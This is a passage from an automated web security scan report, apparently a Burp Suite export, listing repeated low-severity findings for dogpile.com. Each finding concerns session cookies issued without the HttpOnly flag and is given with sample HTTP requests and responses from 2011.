The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6172a79eb9f246e79ad9c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:30 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:30 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/tips/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.60. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_prefer/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=a9902889eb724bb4a6c8c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.61. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/GE+Zero+Taxes

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=e6f6610586a64449abb9c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:39 GMT; path=/
wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301677138088; path=/
wsRecent=GE+Zero+Taxes,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.62. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/Go+Daddy+CEO+Elephant

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=af5ad2b55c194ed28a4dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:58 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:58 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:58 GMT; path=/
wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301676971532; path=/
wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,

Response

7.63. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/MLB+Schedule

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:02 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:02 GMT; path=/
wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; path=/
wsRecent=MLB+Schedule,Web,Relevance,; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.64. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=ca6e8004e2754a219792c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:42 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:42 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/about/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.65. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=87f215cdd6a246a69870c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:52 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/aboutresults/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.66. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=3f9553d8ae70430197ccc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.67. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=c1eb80fd75d841fcb438c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:54 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.68. http://www.dogpile.com/dogpile_rss/ws/index/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=50b69dc71f5b4e528b29c16a3af0cb01&ActionId=e35e7644240d4a61a75ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:12 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:12 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.69. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d5d171eb7a7b49f68a6ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:57 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:57 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.70. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=1e1c491665bb4188add9c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:04 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:04 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:04 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.71. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=9191d9ea4ae34db9bd03c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:00 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:00 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.72. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/preferences/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=67d5f97c29004c7f95e7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:49 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:49 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:49 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/preferences/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.73. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2ac69a9dac404f829d51c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:48 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.74. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/privacy/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=72ca3c5c3a5c40f5b00cc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:59 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:59 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/privacy/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.75. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=ad3543f0276b4b60a6f1c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:47 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.76. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=2d6f022260dd4c51b0a9c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.77. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=ac9d5b1703fc46f1a597c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:27 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.78. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=61f30d71ade94af38defc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:13 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:13 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.79. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=b2e5bc5af4a743d08706c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:41 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:41 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:41 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Email/1/302364/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=b2e5bc5af4a743d08706c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:41 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:41 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:41 GMT
Connection: close
Content-Length: 264

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20Email/1/302364/RightNav/Relevance/iq=true/zoom=off/qln
...[SNIP]...

7.80. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=3e765be57518437a8a99c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.81. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

Issue detail

